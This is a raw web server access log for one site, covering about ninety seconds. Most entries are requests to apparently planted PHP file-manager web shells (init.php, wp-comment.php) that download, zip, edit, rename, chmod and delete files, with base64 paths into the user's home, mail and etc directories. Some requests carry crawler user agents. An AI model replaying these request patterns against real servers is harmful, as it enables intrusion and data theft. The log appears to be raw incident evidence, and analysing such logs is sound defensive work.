74.7.227.14 - - [23/Dec/2025:21:39:39 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=www.tar.gz HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:40 -0600] "GET /resources/views/layouts/init.php?edit=www.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 14566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:40 -0600] "GET /resources/views/layouts/init.php?edit=www.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:41 -0600] "GET /resources/views/layouts/init.php?edit=www.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 14566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:41 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLmNwaG9yZGUudGFyLmd6 HTTP/1.1" 200 24211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:42 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLmNwaG9yZGUudGFy HTTP/1.1" 200 1598976 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:42 -0600] "GET /resources/views/layouts/init.php?zip=L2hvbWUvd3NhcmRhcmd1cmphcmkvbWFpbA== HTTP/1.1" 200 105882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:48 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=www.tar HTTP/1.1" 200 18885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:49 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLmNwaG9yZGUuemlw HTTP/1.1" 200 1597598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:49 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=www.zip HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:50 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=www.tar HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:50 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=www.zip HTTP/1.1" 200 18885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:51 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvLmJhc2hfbG9nb3V0 HTTP/1.1" 200 18 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:39:51 -0600] "GET /resources/views/layouts/init.php?zip=L2hvbWUvd3NhcmRhcmd1cmphcmkvZXRj HTTP/1.1" 200 105571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.94.199.128 - - [23/Dec/2025:21:40:01 -0600] "GET /visitor/epaper/epaper.aspx HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:39:57 -0600] "GET /resources/views/layouts/init.php?gz=L2hvbWUvd3NhcmRhcmd1cmphcmkvZXRj HTTP/1.1" 200 105571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:03 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvLnNwYW1hc3Nhc3NpbmJveGVuYWJsZQ== HTTP/1.1" 200 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:03 -0600] "GET /resources/views/layouts/init.php?gz=L2hvbWUvd3NhcmRhcmd1cmphcmkvLmtvYWxpdHk= HTTP/1.1" 200 105571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:40:12 -0600] "GET / HTTP/1.1" 200 2429 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
80.94.68.138 - - [23/Dec/2025:21:40:12 -0600] "GET /favicon.ico HTTP/1.1" 404 - "http://www.sardargurjari.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:40:08 -0600] "GET /resources/views/layouts/init.php?zip=L2hvbWUvd3NhcmRhcmd1cmphcmkvLnRyYXNo HTTP/1.1" 200 106987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:40:14 -0600] "GET /wp-admin.zip HTTP/1.1" 200 95153 "http://www.sardargurjari.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:40:12 -0600] "GET /resources/views/layouts/init.php?gz=L2hvbWUvd3NhcmRhcmd1cmphcmkvLnRyYXNo HTTP/1.1" 200 108883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:17 -0600] "GET /resources/views/layouts/init.php?zip=L2hvbWUvd3NhcmRhcmd1cmphcmkvLmtvYWxpdHk= HTTP/1.1" 200 108883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:21 -0600] "GET /resources/views/layouts/init.php?edit=ssl.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 73598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:22 -0600] "GET /resources/views/layouts/init.php?delete=.cpanel.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 107773 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:27 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.bash_logout.tar HTTP/1.1" 200 18919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:27 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=logs.tar.gz HTTP/1.1" 200 18909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:28 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.cpanel.zip HTTP/1.1" 200 18909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:40:27 -0600] "GET /wp-content.zip HTTP/1.1" 200 606208 "http://www.sardargurjari.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:40:28 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.bashrc.tar HTTP/1.1" 200 18909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:29 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.cpanel.tar.gz HTTP/1.1" 200 18915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:30 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=mail.tar.gz HTTP/1.1" 200 18909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:30 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnRyYXNoLnppcA== HTTP/1.1" 200 1335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:31 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bashrc.tar HTTP/1.1" 200 18893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:31 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.cpanel.tar HTTP/1.1" 200 18909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:32 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bash_logout.tar HTTP/1.1" 200 18903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:32 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.cphorde.tar.gz HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:33 -0600] "GET /resources/views/layouts/init.php?edit=access-logs.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:33 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=mail.tar.gz HTTP/1.1" 200 18893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
15.235.96.135 - - [23/Dec/2025:21:40:33 -0600] "GET /wp-comment.php.php.tar.gz HTTP/1.1" 200 29374 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [23/Dec/2025:21:40:34 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.cpanel.tar HTTP/1.1" 200 18893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:34 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.cpanel.zip HTTP/1.1" 200 18893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:35 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=logs.tar.gz HTTP/1.1" 200 18893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:35 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.spamassassinenable.spamassassinenable.tar.gz HTTP/1.1" 200 18961 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:36 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.spamassassinenable.spamassassinenable.tar.gz HTTP/1.1" 200 18977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:36 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.razor.tar HTTP/1.1" 200 18891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:37 -0600] "GET /resources/views/layouts/init.php?edit=.razor.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 57922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:37 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.razor.zip HTTP/1.1" 200 18891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:38 -0600] "GET /resources/views/layouts/init.php?edit=ssl.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:38 -0600] "GET /resources/views/layouts/init.php?edit=tmp.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 14566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:39 -0600] "GET /resources/views/layouts/init.php?edit=.cpanel.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19012 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:40 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=tmp.tar.gz HTTP/1.1" 200 18891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:40:42 -0600] "GET /wp-comment.php HTTP/1.1" 200 35338 "http://www.sardargurjari.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
66.249.68.4 - - [23/Dec/2025:21:40:44 -0600] "GET /visitorm/mDetailView.aspx?NewsId=59820 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.14 - - [23/Dec/2025:21:40:40 -0600] "GET /resources/views/layouts/init.php?delete=.razor.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 106678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:47 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.razor.zip HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:47 -0600] "GET /resources/views/layouts/init.php?edit=.cphorde.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:48 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.trash.zip HTTP/1.1" 200 18891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:48 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.razor.tar HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:49 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=ssl.tar.gz HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:49 -0600] "GET /resources/views/layouts/init.php?edit=.trash.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:50 -0600] "GET /resources/views/layouts/init.php?edit=tmp.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 14566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:50 -0600] "GET /resources/views/layouts/init.php?edit=.bashrc.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 21060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:51 -0600] "GET /resources/views/layouts/init.php?edit=.trash.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 22642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:51 -0600] "GET /resources/views/layouts/init.php?edit=.razor.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:40:53 -0600] "GET /wp-comment.php?fm=true&rename=wp-admin.zip&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18829 "http://www.sardargurjari.com/wp-comment.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:40:52 -0600] "GET /resources/views/layouts/init.php?delete=.trash.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 105584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:57 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=ssl.tar.gz HTTP/1.1" 200 18891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:58 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.trash.zip HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:58 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=tmp.tar.gz HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:59 -0600] "GET /resources/views/layouts/init.php?edit=.cphorde.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:40:59 -0600] "GET /resources/views/layouts/init.php?edit=.cphorde.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:00 -0600] "GET /resources/views/layouts/init.php?edit=.cpanel.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19018 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:00 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.trash.tar.gz HTTP/1.1" 200 18897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:01 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.razor.tar.gz HTTP/1.1" 200 18913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:01 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.razor.tar.gz HTTP/1.1" 200 18897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:02 -0600] "GET /resources/views/layouts/init.php?edit=.trash.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19016 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:03 -0600] "GET /resources/views/layouts/init.php?edit=.razor.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19016 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:03 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.trash.tar.gz HTTP/1.1" 200 18913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:04 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvLnNwYW1hc3Nhc3NpbmVuYWJsZQ== HTTP/1.1" 200 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:04 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=ssl.tar HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:05 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.cphorde.zip HTTP/1.1" 200 18895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:41:06 -0600] "GET /wp-comment.php?fm_settings=true HTTP/1.1" 200 25452 "http://www.sardargurjari.com/wp-comment.php?fm=true&rename=wp-admin.zip&path=/home/wsardargurjari/public_html/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:41:05 -0600] "GET /resources/views/layouts/init.php?delete=.cphorde.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 104471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:10 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=access-logs.zip HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
